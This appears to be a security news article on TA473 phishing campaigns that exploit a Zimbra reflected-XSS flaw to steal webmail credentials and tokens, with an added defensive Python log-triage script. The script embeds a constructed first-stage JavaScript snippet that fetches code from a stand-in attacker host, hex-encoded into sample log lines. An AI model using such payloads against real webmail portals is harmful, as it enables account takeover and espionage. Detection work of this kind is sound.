These phishing campaigns are exploiting a Zimbra vulnerability and affecting internet-facing webmail services. Learn how to protect your organization from this security threat.

A new Proofpoint report indicates that in late 2022, threat actor TA473 targeted elected officials and staffers in the U.S., as well as experts in European politics and economics. Proofpoint also states that “social engineering lures and impersonated organizations often pertain to Ukraine in the context of armed conflict” and notes that the email mailboxes of NATO-aligned government entities were targeted in Europe.
In older phishing campaigns from TA473, targets included Polish government agencies, Ukraine’s and Italy’s Ministries of Foreign Affairs, and individuals within the Indian government.
TA473 is a threat actor, active since at least 2021, that has targeted several countries aligned against the interests of Belarus and Russia; the group is tracked as Winter Vivern by some security companies and government entities.
Although there is no confirmed evidence, a few elements support the theory that the threat actor originates from Russia. For instance, a Russian-language word has leaked into some of the group's malware samples and documents. Beyond that slip, TA473's consistent alignment with Russian interests makes a Russian origin plausible.
The threat actor mostly creates phishing campaigns to deliver payloads and harvest credentials. Payloads often target vulnerabilities in internet-facing webmail services and allow attackers to get access to email mailboxes.
Rather than developing tools to automate parts of its attacks, the group invests time and resources to compromise specific entities with custom payloads for the targeted webmail portal.
TA473 often sends emails from compromised email addresses hosted on unpatched or otherwise insecure WordPress domains. The visible link text in these emails is a benign URL belonging to the targeted organization or a relevant peer organization, and the sender address is spoofed to look as if the message comes from that organization. The benign-looking link text is then hyperlinked to an actor-controlled or compromised destination that either delivers a first-stage payload or redirects the victim to a credential-harvesting landing page (Figure A).
Figure A

In some cases, TA473 uses structured URI paths that indicate a hashed value for the targeted individual, an unencoded indication of the targeted organization, and encoded or plaintext versions of the benign URL that was hyperlinked in the initial email to targets.
In early 2023, the threat actor started exploiting a known vulnerability in Zimbra Collaboration version 9.0.0 (CVE-2022-27926, a reflected cross-site scripting flaw), a product often used to host internet-accessible webmail portals. To exploit it, the malicious link in the phishing email carries a hexadecimal-encoded JavaScript snippet that the vulnerable Zimbra software reflects back as an error parameter, so the victim's browser executes it in the context of the webmail portal (Figure B).
Figure B

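A defender's first question after reading the above is how to find such links in proxy or web-server logs. The following is an added triage example written for this article, not code from the original page or from Proofpoint's report: it parses constructed sample log lines, hex-decodes every query-string value that looks like pure hex, and flags values that decode to (or already contain) JavaScript. The host, path and the parameter name `error` are assumptions for illustration; the check runs over every parameter, not just one.

```python
"""Triage helper: spot hex-encoded JavaScript smuggled through a URL parameter.

Added example for illustration; not the article's or Proofpoint's code.
The log lines, host names and parameter names below are constructed.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Even-length hex string of at least 8 bytes; shorter hex (e.g. a hash prefix) is ignored.
HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2}){8,}$")
# Extract the request URL from a simple constructed log format: ... "GET <url>" <status>
REQUEST_RE = re.compile(r'"GET (\S+)"')
# Substrings typically present in a first-stage XSS snippet that loads a next stage.
JS_MARKERS = ("<script", "document.", "window.", "eval(", "fetch(",
              "XMLHttpRequest", "location.", "createElement")


def decode_hex(value: str) -> Optional[str]:
    """Return the decoded text if `value` is pure hex that decodes to text, else None."""
    if not HEX_RE.match(value):
        return None
    try:
        text = bytes.fromhex(value).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def suspicious_params(url: str) -> List[Tuple[str, str, str]]:
    """Return (param_name, encoding, script) for each query value that is JavaScript.

    encoding is "hex" when the value had to be hex-decoded, "plain" otherwise.
    parse_qs already percent-decodes the values, so %3Cscript%3E is seen as <script>.
    """
    hits = []
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for value in values:
            decoded = decode_hex(value)
            if decoded is not None and any(m in decoded for m in JS_MARKERS):
                hits.append((name, "hex", decoded))
            elif any(m in value for m in JS_MARKERS):
                hits.append((name, "plain", value))
    return hits


def triage(log_lines: List[str]) -> List[Tuple[int, str, str, str]]:
    """Scan log lines; return (line_number, param, encoding, script) for each finding."""
    findings = []
    for lineno, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for name, encoding, script in suspicious_params(match.group(1)):
            findings.append((lineno, name, encoding, script))
    return findings


# Constructed first-stage snippet of the kind described in the article: it only
# injects a second <script> element pointing at an (assumed) attacker host.
STAGE1_JS = ('var s=document.createElement("script");'
             's.src="https://stage.example.invalid/n.js";document.body.appendChild(s);')

# Constructed proxy log: one benign request, one hex-encoded JS payload,
# one hex-encoded but harmless string, one plain (percent-encoded) script tag.
SAMPLE_LOG = [
    '2023-02-14T09:12:03Z 10.0.0.7 "GET https://webmail.example.invalid/mail?folder=inbox" 200',
    '2023-02-14T09:12:41Z 10.0.0.7 "GET https://webmail.example.invalid/error?error='
    + STAGE1_JS.encode().hex() + '" 200',
    '2023-02-14T09:13:05Z 10.0.0.9 "GET https://webmail.example.invalid/error?error='
    + "Session expired".encode().hex() + '" 200',
    '2023-02-14T09:14:22Z 10.0.0.9 "GET https://webmail.example.invalid/error?error='
    '%3Cscript%20src%3D%22https%3A%2F%2Fcdn.example.invalid%2Fx.js%22%3E%3C%2Fscript%3E" 200',
]

if __name__ == "__main__":
    for lineno, name, encoding, script in triage(SAMPLE_LOG):
        print(f"line {lineno}: param={name} ({encoding}): {script[:60]}")
```

Run against real logs, the interesting lines are the ones where the decoded value lands in the webmail origin; a hex-encoded string that decodes to plain text (line 3 of the sample) is deliberately not reported, which keeps the noise down on portals that legitimately hex-encode status messages.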
Once decoded and executed, the JavaScript snippet downloads a next-stage payload that performs cross-site request forgery (CSRF) requests to steal the username, password and CSRF tokens of the user who clicked the malicious link (Figure C).
Figure C

The JavaScript used by TA473 also attempts to log in to the legitimate webmail portal using the active tokens it has stolen.
Proofpoint has observed that the threat actor sometimes targets specific Roundcube webmail request tokens as well, which indicates that the threat actor performed reconnaissance on the target's webmail platform before attacking it.
Disclosure: I work for Trend Micro, but the views expressed in this article are mine.
Cedric Pernet is a senior threat expert with a strong focus on cybercrime and cyberespionage. He currently works at Trend Micro. Prior to that position, he worked for several Computer Emergency Response Teams (CERTs), where he conducted threat intelligence investigations, incident response and computer forensics. He was also a law enforcement officer working on cybercrime in France. He is the author of a French-language book on cyberespionage and an influential person in the cybersecurity community.